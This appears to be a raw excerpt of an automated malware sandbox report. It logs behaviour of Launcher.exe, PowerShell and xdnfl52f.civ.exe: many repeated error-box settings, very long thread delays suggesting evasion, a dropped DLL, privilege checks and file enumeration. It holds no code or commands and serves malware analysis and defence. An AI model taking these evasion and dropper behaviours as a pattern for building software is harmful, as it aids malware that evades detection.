              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeMemory allocated: 5120000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Temp\Launcher.exeMemory allocated: 7AB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Temp\Launcher.exeMemory allocated: 7500000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Temp\Launcher.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4224Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5635Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7996Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1668Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5403Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4346Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Windows\Temp\iviewers.dllJump to dropped file
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-69103
              Source: C:\Windows\Temp\Launcher.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-7598
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\Temp\Launcher.exe TID: 6380Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6104Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -24903104499507879s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A72B500 FindClose,FindFirstFileExW,GetLastError,10_2_00007FF75A72B500
